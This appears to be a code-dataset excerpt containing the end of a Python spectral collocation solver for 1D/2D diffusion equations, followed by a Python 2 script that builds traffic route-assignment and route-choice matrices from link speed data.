error_estimate = self.integrate(residual * adj_solution, self.order*2)
return error_estimate
def evaluate_gradient(self, sample):
assert sample.ndim == 1
num_stoch_dims = sample.shape[0]
# qoi_deriv = self.qoi_functional_deriv(self.mesh_pts)
adj_solution = self.solve_adjoint(sample, self.order)
gradient = np.empty((num_stoch_dims), float)
for i in range(num_stoch_dims):
diffusivity_deriv_vals_i = self.diffusivity_derivs_function(
self.mesh_pts.squeeze(), sample, i)
forcing_deriv_vals_i = self.forcing_derivs_function(
self.mesh_pts.squeeze(), sample, i)
residual_deriv = self.compute_residual_derivative(
self.fwd_solution, diffusivity_deriv_vals_i,
forcing_deriv_vals_i)
gradient[i] = self.integrate(residual_deriv * adj_solution)
return gradient
def value(self, sample):
assert sample.ndim == 1
solution = self.run(sample)
qoi = self.qoi_functional(solution)
if np.isscalar(qoi) or qoi.ndim == 0:
qoi = np.array([qoi])
return qoi
def integrate(self, mesh_values, order=None):
if order is None:
order = self.order
# Get Gauss-Legendre rule
gl_pts, gl_wts = gauss_jacobi_pts_wts_1D(order, 0, 0)
# Scale points from [-1,1] to the physical domain
x_range = self.xlim[1]-self.xlim[0]
gl_pts = x_range*(gl_pts+1.)/2.+self.xlim[0]
# Remove factor of 0.5 from weights
gl_wts *= x_range
# Interpolate mesh values onto quadrature nodes
gl_vals = self.interpolate(mesh_values, gl_pts)
# Compute and return integral
return np.dot(gl_vals[:, 0], gl_wts)
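# A small worked example (editorial sketch, hypothetical values): after
# initialize(8, bndry_cond=[0., 0.], xlim=[0., 1.]), integrating the mesh
# values of x**2 should return approximately 1/3, e.g.
# >>> abs(model.integrate(model.mesh_pts**2) - 1./3) < 1e-10
# True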
def interpolate(self, mesh_values, eval_samples):
if eval_samples.ndim == 1:
eval_samples = eval_samples[None, :]
if mesh_values.ndim == 1:
mesh_values = mesh_values[:, None]
assert mesh_values.ndim == 2
num_dims = eval_samples.shape[0]
abscissa_1d = [self.mesh_pts_1d]*num_dims
weights_1d = [compute_barycentric_weights_1d(xx) for xx in abscissa_1d]
interp_vals = multivariate_barycentric_lagrange_interpolation(
eval_samples,
abscissa_1d,
weights_1d,
mesh_values,
np.arange(num_dims))
return interp_vals
def plot(self, mesh_values, num_plot_pts_1d=None, plot_mesh_coords=None,
color='k'):
import pylab
if num_plot_pts_1d is not None:
# interpolate values onto plot points
plot_mesh = np.linspace(
self.xlim[0], self.xlim[1], num_plot_pts_1d)
interp_vals = self.interpolate(mesh_values, plot_mesh)
pylab.plot(plot_mesh, interp_vals, color+'-')
elif plot_mesh_coords is not None:
assert mesh_values.shape[0] == plot_mesh_coords.squeeze().shape[0]
pylab.plot(plot_mesh_coords, mesh_values, 'o-'+color)
else:
# just plot values on mesh points
pylab.plot(self.mesh_pts, mesh_values, color)
def get_collocation_points(self):
return np.atleast_2d(self.mesh_pts)
def get_derivative_matrix(self):
return self.derivative_matrix
def __call__(self, samples):
return evaluate_1darray_function_on_2d_array(
self.value, samples, None)
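# A minimal end-to-end usage sketch (editorial addition; the values are
# hypothetical and not taken from the original source). With a(x)=1 and
# f(x)=2 on [0,1] with zero Dirichlet conditions, the solver should recover
# u(x) = x*(x-1) up to round-off:
# >>> model = SteadyStateDiffusionEquation1D()
# >>> model.initialize(16, bndry_cond=[0., 0.], xlim=[0., 1.])
# >>> x = model.mesh_pts
# >>> u = model.solve(np.ones(x.shape[0]), 2.*np.ones(x.shape[0]))
# >>> np.allclose(u, x*(x-1.))
# True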
class SteadyStateDiffusionEquation2D(SteadyStateDiffusionEquation1D):
"""
solve (a(x)*u_x)_x = f; x in [0,1]x[0,1];
subject to u(0,:)=a(x); u(:,0)=b(x), u(1,:)=c(x), u(:,1)=d(x)
"""
def __init__(self):
self.diffusivity = None
self.forcing_function = None
self.bndry_cond = [0., 0., 0., 0.]
self.xlim = [0, 1]
self.ylim = [0, 1]
self.left_bc, self.right_bc = None, None
self.top_bc, self.bottom_bc = None, None
# default qoi functional is integral of solution over entire domain
self.qoi_functional = self.integrate
self.qoi_functional_deriv = lambda x: x*0.+1.
def determine_boundary_indices(self):
# boundary edges are stored with the following order,
# left, right, bottom, top
self.boundary_edges = [[], [], [], []]
self.boundary_indices = np.empty((4*self.order), int)
# To avoid double counting, the corner points are assigned to the
# left/right edges and are not included in the bottom/top edge indices
cntr = 0
for i in range(self.mesh_pts.shape[1]):
if (self.mesh_pts[0, i] == self.xlim[0]):
self.boundary_indices[cntr] = i
self.boundary_edges[0].append(cntr)
cntr += 1
elif (self.mesh_pts[0, i] == self.xlim[1]):
self.boundary_indices[cntr] = i
self.boundary_edges[1].append(cntr)
cntr += 1
elif (self.mesh_pts[1, i] == self.ylim[0]):
self.boundary_indices[cntr] = i
self.boundary_edges[2].append(cntr)
cntr += 1
elif (self.mesh_pts[1, i] == self.ylim[1]):
self.boundary_indices[cntr] = i
self.boundary_edges[3].append(cntr)
cntr += 1
def initialize(self, order, bndry_cond=None, lims=None):
# the 1d model transforms the 1d mesh points from [-1,1] to [a,b];
# assume the second physical dimension is also on [a,b]
super(SteadyStateDiffusionEquation2D, self).initialize(order,
bndry_cond[:2],
lims[:2])
self.ylim = lims[2:]
self.bndry_cond = bndry_cond
self.order = order
self.mesh_pts_1d = self.mesh_pts
self.mesh_pts = cartesian_product([self.mesh_pts_1d]*2, 1)
# note: scaling of self.derivative_matrix to [a,b] happens in the base class
self.determine_boundary_indices()
# form derivative (in x1-direction) matrix of a 2d polynomial
# this assumes that 2d-mesh_pts varies in x1 faster than x2,
# e.g. points are
# [[x11,x21],[x12,x21],[x13,x12],[x11,x22],[x12,x22],...]
Ident = np.eye(self.order+1)
derivative_matrix_1d = self.get_derivative_matrix()
self.derivative_matrix_1 = np.kron(Ident, derivative_matrix_1d)
# form derivative (in x2-direction) matrix of a 2d polynomial
self.derivative_matrix_2 = np.kron(derivative_matrix_1d, Ident)
def form_collocation_matrix(self, derivative_matrix, diagonal):
scaled_matrix_1 = np.empty(self.derivative_matrix_1.shape)
scaled_matrix_2 = np.empty(self.derivative_matrix_2.shape)
for i in range(scaled_matrix_1.shape[0]):
scaled_matrix_1[i, :] = self.derivative_matrix_1[i, :]*diagonal[i]
scaled_matrix_2[i, :] = self.derivative_matrix_2[i, :]*diagonal[i]
matrix_1 = np.dot(self.derivative_matrix_1, scaled_matrix_1)
matrix_2 = np.dot(self.derivative_matrix_2, scaled_matrix_2)
return matrix_1 + matrix_2
def apply_boundary_conditions_to_matrix(self, matrix):
# apply default homogeneous (zero-value) Dirichlet conditions if
# necessary
if self.left_bc is None:
self.left_bc = lambda x: 0.
if self.right_bc is None:
self.right_bc = lambda x: 0.
if self.bottom_bc is None:
self.bottom_bc = lambda x: 0.
if self.top_bc is None:
self.top_bc = lambda x: 0.
# adjust collocation matrix
matrix[self.boundary_indices, :] = 0.
for i in range(self.boundary_indices.shape[0]):
index = self.boundary_indices[i]
matrix[index, index] = 1.
return matrix
def apply_boundary_conditions_to_rhs(self, forcing):
# apply left boundary condition
indices = self.boundary_indices[self.boundary_edges[0]]
forcing[indices] = self.left_bc(self.mesh_pts[0, indices])
# apply right boundary condition
indices = self.boundary_indices[self.boundary_edges[1]]
forcing[indices] = self.right_bc(self.mesh_pts[0, indices])
# apply bottom boundary condition
indices = self.boundary_indices[self.boundary_edges[2]]
forcing[indices] = self.bottom_bc(self.mesh_pts[1, indices])
# apply top boundary condition
indices = self.boundary_indices[self.boundary_edges[3]]
forcing[indices] = self.top_bc(self.mesh_pts[1, indices])
return forcing
def plot(self, mesh_values, num_plot_pts_1d=100):
if num_plot_pts_1d is not None:
# interpolate values onto plot points
def func(x): return self.interpolate(mesh_values, x)
from utilities.visualisation import plot_surface_from_function
plot_surface_from_function(func, [self.xlim[0], self.xlim[1],
self.ylim[0], self.ylim[1]],
num_plot_pts_1d, False)
def apply_adjoint_boundary_conditions_to_rhs(self, qoi_deriv):
# adjoint always has zero Dirichlet BC
# apply left boundary condition
for ii in range(4):
indices = self.boundary_indices[self.boundary_edges[ii]]
qoi_deriv[indices] = 0
return qoi_deriv
def integrate(self, mesh_values, order=None):
if order is None:
order = self.order
# Get Gauss-Legendre rule
gl_pts, gl_wts = gauss_jacobi_pts_wts_1D(order, 0, 0)
pts_1d, wts_1d = [], []
lims = self.xlim+self.ylim
for ii in range(2):
# Scale points from [-1,1] to the physical domain
x_range = lims[2*ii+1]-lims[2*ii]
# Remove factor of 0.5 from weights and shift to [a,b]
wts_1d.append(gl_wts*x_range)
pts_1d.append(x_range*(gl_pts+1.)/2.+lims[2*ii])
# Interpolate mesh values onto quadrature nodes
pts = cartesian_product(pts_1d)
wts = outer_product(wts_1d)
gl_vals = self.interpolate(mesh_values, pts)
# Compute and return integral
return np.dot(gl_vals[:, 0], wts)
| 2.1875
| 2
|
base.py
|
Lemma1/DPFE
| 16
|
12783550
|
import numpy as np
import pandas as pd
import datetime
import os
import matplotlib.pyplot as plt
import matplotlib
import networkx as nx
import pickle
from collections import OrderedDict
import copy
from scipy.sparse import csr_matrix
from scipy import io
import seaborn as sns
import joblib
class Link:
def __init__(self, ID, length, fft):
self.ID = ID
self.length = length
self.fft = fft
class Path:
def __init__(self):
self.node_list = None
self.link_list = None
self.cost = None
self.p = None
return
def node_to_list(self, G, link_dict):
if self.node_list is None:
print "Nothing to convert"
return
tmp = list()
for i in xrange(len(self.node_list) - 1):
try:
link_ID = G[self.node_list[i]][self.node_list[i+1]]["ID"]
if link_ID not in link_dict.keys():
tmp_link = Link(link_ID, G[self.node_list[i]][self.node_list[i+1]]["length"],
G[self.node_list[i]][self.node_list[i+1]]["fft"])
tmp.append(tmp_link)
link_dict[link_ID] = tmp_link
else:
tmp.append(link_dict[link_ID])
except:
print "ERROR"
print self.node_list[i], self.node_list[i+1]
self.link_list = tmp
def overlap(min1, max1, min2, max2):
return max(0, min(max1, max2) - max(min1, min2))
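# Editorial note: overlap() returns the length of the intersection of the
# intervals [min1, max1] and [min2, max2], clipped at zero, e.g.
# overlap(0, 5, 3, 10) == 2 and overlap(0, 2, 3, 10) == 0.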
def get_finish_time(spd, length_togo, start_time, tmp_date):
basis = datetime.datetime.combine(tmp_date, datetime.time(0,0,0))
time_seq = map(lambda x: (datetime.datetime.combine(tmp_date, x) - basis).total_seconds(), spd.index)
data = np.array(spd.tolist()).astype(np.float)
# print data
# print time_seq
cur_spd = np.interp((datetime.datetime.combine(tmp_date, start_time) - basis).total_seconds(), time_seq, data) / 1600.0 * 3600.0
try:
new_start_time = (datetime.datetime.combine(tmp_date, start_time) + datetime.timedelta(seconds = length_togo/cur_spd)).time()
# print "need:", length_togo/cur_spd
except:
new_start_time = (datetime.datetime.combine(tmp_date, start_time) + datetime.timedelta(seconds = 10)).time()
return new_start_time
########################
## deprecated
########################
# def get_arrival_time(start_time, link_list, spd_data, tmp_date, link_dict, spd=None):
# if len(link_list) == 0:
# return start_time
# link_to_pass = link_list[0]
# if link_to_pass.length == np.float(0):
# link_list.pop(0)
# return get_arrival_time(start_time, link_list, spd_data, tmp_date, link_dict)
# if link_to_pass.ID not in spd_data.keys():
# link_list.pop(0)
# new_start_time = (datetime.datetime.combine(tmp_date, start_time) + datetime.timedelta(seconds = np.round(link_to_pass.fft))).time()
# return get_arrival_time(new_start_time, link_list, spd_data, tmp_date, link_dict)
# if type(spd) == type(None):
# spd = spd_data[link_to_pass.ID].loc[tmp_date]
# length_togo = link_to_pass.length
# new_start_time = get_finish_time(spd, length_togo, start_time, tmp_date)
# link_list.pop(0)
# return get_arrival_time(new_start_time, link_list, spd_data, tmp_date, link_dict, spd)
# def get_ratio(path, link, h, spd_data, analysis_start_time, time_interval, tmp_date, link_dict):
# start_time = (datetime.datetime.combine(tmp_date, analysis_start_time) + h * time_interval).time()
# start_time2 = (datetime.datetime.combine(tmp_date, analysis_start_time) + (h+1) * time_interval).time()
# tmp_link_list = list()
# for tmp_link in path.link_list:
# if link != tmp_link:
# tmp_link_list.append(tmp_link)
# else:
# break
# # print tmp_link_list
# arrival_time = get_arrival_time(start_time, copy.copy(tmp_link_list), spd_data, tmp_date, link_dict)
# arrival_time2 = get_arrival_time(start_time2, copy.copy(tmp_link_list), spd_data, tmp_date, link_dict)
# p_v = get_pv(arrival_time, arrival_time2, start_time, time_interval, tmp_date)
# if (len(p_v) > 2):
# print start_time, arrival_time, arrival_time2
# print p_v
# return p_v
# row_list = list()
# col_list = list()
# data_list = list()
# for k, path in enumerate(path_list):
# print k, len(path.link_list)
# for a, link in enumerate(link_list):
# if (delta[a, k] == 1):
# for h in xrange(N):
# p_v = get_ratio(path, link, h, spd_data, analysis_start_time, time_interval, tmp_date, link_dict)
# for idx, p in enumerate(p_v):
# if (h + idx < N):
# x_loc = a + num_link * (h + idx)
# y_loc = k + num_path * h
# row_list.append(x_loc)
# col_list.append(y_loc)
# data_list.append(p)
def get_pv(arrival_time, arrival_time2, analysis_start_time, time_interval, tmp_date):
basis = datetime.datetime.combine(tmp_date, datetime.time(0,0,0))
arrival_time_date = datetime.datetime.combine(tmp_date, arrival_time)
arrival_time_date2 = datetime.datetime.combine(tmp_date, arrival_time2)
total = np.float((arrival_time_date2 -arrival_time_date).total_seconds())
cur_time_date = datetime.datetime.combine(tmp_date, analysis_start_time)
pv = list()
while(cur_time_date < arrival_time_date2):
cur_time_date2 = cur_time_date + time_interval
overlap_zone = overlap((cur_time_date - basis).total_seconds(), (cur_time_date2 - basis).total_seconds(), (arrival_time_date - basis).total_seconds(), (arrival_time_date2 - basis).total_seconds())
# print np.float(overlap_zone) / total
pv.append(np.float(overlap_zone) / total)
cur_time_date = cur_time_date2
return pv
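# Editorial worked example (hypothetical numbers): with analysis_start_time
# 08:00, a 15-minute time_interval and a trip spanning 08:10-08:30, the bins
# [08:00, 08:15) and [08:15, 08:30) overlap the trip by 5 and 15 minutes
# respectively, so get_pv returns [0.25, 0.75].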
def get_arrival_time(start_time, link, spd_data, tmp_date, link_dict):
link_to_pass = link
if link_to_pass.length == np.float(0):
return start_time
if link_to_pass.ID not in spd_data.keys():
new_start_time = (datetime.datetime.combine(tmp_date, start_time) + datetime.timedelta(seconds = link_to_pass.fft)).time()
return new_start_time
try:
spd = spd_data[link_to_pass.ID].loc[tmp_date]
except:
print "Except, not spd data"
new_start_time = (datetime.datetime.combine(tmp_date, start_time) + datetime.timedelta(seconds = link_to_pass.fft)).time()
return new_start_time
length_togo = link_to_pass.length
new_start_time = get_finish_time(spd, length_togo, start_time, tmp_date)
return new_start_time
def get_ratio(path, h, spd_data, analysis_start_time, time_interval, tmp_date, link_dict):
pv_dict = dict()
start_time = (datetime.datetime.combine(tmp_date, analysis_start_time) + h * time_interval).time()
start_time2 = (datetime.datetime.combine(tmp_date, analysis_start_time) + (h+1) * time_interval).time()
arrival_time = copy.copy(start_time)
arrival_time2 = copy.copy(start_time2)
for link in path.link_list:
arrival_time = get_arrival_time(arrival_time, link, spd_data, tmp_date, link_dict)
arrival_time2 = get_arrival_time(arrival_time2, link, spd_data, tmp_date, link_dict)
p_v = get_pv(arrival_time, arrival_time2, start_time, time_interval, tmp_date)
pv_dict[link] = p_v
return pv_dict
def get_assign_matrix(N, spd_data, analysis_start_time, time_interval, tmp_date, link_dict, link_list, link_loc, path_list):
num_link = len(link_list)
num_path = len(path_list)
row_list = list()
col_list = list()
data_list = list()
for k, path in enumerate(path_list):
# if k % 1 == 0:
# print k, len(path_list), len(path.link_list)
for h in xrange(N):
pv_dict = get_ratio(path, h, spd_data, analysis_start_time, time_interval, tmp_date, link_dict)
# print pv_dict
for link, p_v in pv_dict.iteritems():
a = link_loc[link]
for idx, p in enumerate(p_v):
if (h + idx < N):
y_loc = a + num_link * (h + idx)
x_loc = k + num_path * h
row_list.append(y_loc)
col_list.append(x_loc)
data_list.append(p)
# print row_list, col_list
r = csr_matrix((data_list, (row_list, col_list)), shape=(num_link * N, num_path * N))
return r
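# Editorial note: r is a sparse (num_link * N) x (num_path * N) assignment
# matrix; entry (a + num_link*(h+idx), k + num_path*h) holds the fraction of
# the link-a traversal, for trips departing on path k in interval h, that
# falls within analysis interval h+idx.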
def save_r(N, spd_data, analysis_start_time, time_interval, single_date, link_dict, link_list, link_loc, path_list):
import joblib
date_str = single_date.strftime("%Y-%m-%d")
print date_str
r = get_assign_matrix(N, spd_data, analysis_start_time, time_interval, single_date, link_dict, link_list, link_loc, path_list)
joblib.dump(r, os.path.join('R_matrix', date_str+".pickle"))
def softmax(x, theta=-0.01):
# print x
"""Compute softmax values for each sets of scores in x."""
y = np.copy(x) * theta
print y
p = np.minimum(np.maximum(np.exp(y), 1e-20), 1e20) / np.sum(np.minimum(np.maximum(np.exp(y), 1e-20), 1e20), axis=0)
# print p
if np.isnan(p).any():
p = np.ones(len(x)) / len(x)
return p
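# Editorial example (hypothetical costs): with the default theta=-0.01,
# cheaper paths receive higher probability, e.g.
# softmax(np.array([100., 200.])) is roughly [0.73, 0.27].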
def get_full_arrival_time(start_time, link_list, spd_data, tmp_date, link_dict, spd=None):
# if len(link_list) == 0:
# return start_time
# link_to_pass = link_list[0]
# if link_to_pass.length == np.float(0):
# link_list.pop(0)
# return get_full_arrival_time(start_time, link_list, spd_data, tmp_date, link_dict)
# if link_to_pass.ID not in spd_data.keys():
# link_list.pop(0)
# new_start_time = (datetime.datetime.combine(tmp_date, start_time) + datetime.timedelta(seconds = np.round(link_to_pass.fft))).time()
# return get_full_arrival_time(new_start_time, link_list, spd_data, tmp_date, link_dict)
# if type(spd) == type(None):
# spd = spd_data[link_to_pass.ID].loc[tmp_date]
# length_togo = link_to_pass.length
# new_start_time = get_finish_time(spd, length_togo, start_time, tmp_date)
# link_list.pop(0)
arrival_time = copy.copy(start_time)
for link in link_list:
arrival_time = get_arrival_time(arrival_time, link, spd_data, tmp_date, link_dict)
return arrival_time
# tmp_date = datetime.date(2014, 1, 1)
def get_P(N, spd_data, analysis_start_time, time_interval, tmp_date, path_list, OD_paths):
num_path_v = [len(x) for x in OD_paths.itervalues()]
num_path = np.sum(num_path_v)
OD_list = list(OD_paths.keys())
num_OD = len(OD_list)
row_list = list()
col_list = list()
data_list = list()
for h in xrange(N):
# print h, N
start_time = (datetime.datetime.combine(tmp_date, analysis_start_time) + h * time_interval).time()
for (O,D), paths in OD_paths.iteritems():
# print (O,D)
cost_list = list()
for path in paths:
arrival_time = get_full_arrival_time(start_time, path.link_list, spd_data, tmp_date, None)
cost = (datetime.datetime.combine(tmp_date, arrival_time) - datetime.datetime.combine(tmp_date, start_time)).total_seconds()
path.cost = cost
cost_list.append(cost)
p_list = softmax(cost_list)
print cost_list, p_list
for idx, path in enumerate(paths):
path.p = p_list[idx]
# print p_list
for rs, (O,D) in enumerate(OD_list):
for k, path in enumerate(path_list):
if k < np.sum(num_path_v[0:rs+1]) and k >= np.sum(num_path_v[0:rs]):
x_loc = h * num_OD + rs
y_loc = h * num_path + k
data = path.p
row_list.append(y_loc)
col_list.append(x_loc)
data_list.append(data)
P = csr_matrix((data_list, (row_list, col_list)), shape=(num_path * N, num_OD * N))
return P
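# Editorial note: P is a sparse (num_path * N) x (num_OD * N) matrix of
# route-choice probabilities; entry (h*num_path + k, h*num_OD + rs) is the
# logit (softmax over travel cost) probability of choosing path k for OD
# pair rs in departure interval h.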
def save_p(N, spd_data, analysis_start_time, time_interval, single_date, path_list, OD_paths):
import joblib
date_str = single_date.strftime("%Y-%m-%d")
print date_str
P = get_P(N, spd_data, analysis_start_time, time_interval, single_date, path_list, OD_paths)
joblib.dump(P, os.path.join('P_matrix', date_str+".pickle"))
def to_south((O,D)):
real_O = O % 1000
real_D = D % 1000
return real_O < real_D
| 2.171875
| 2
|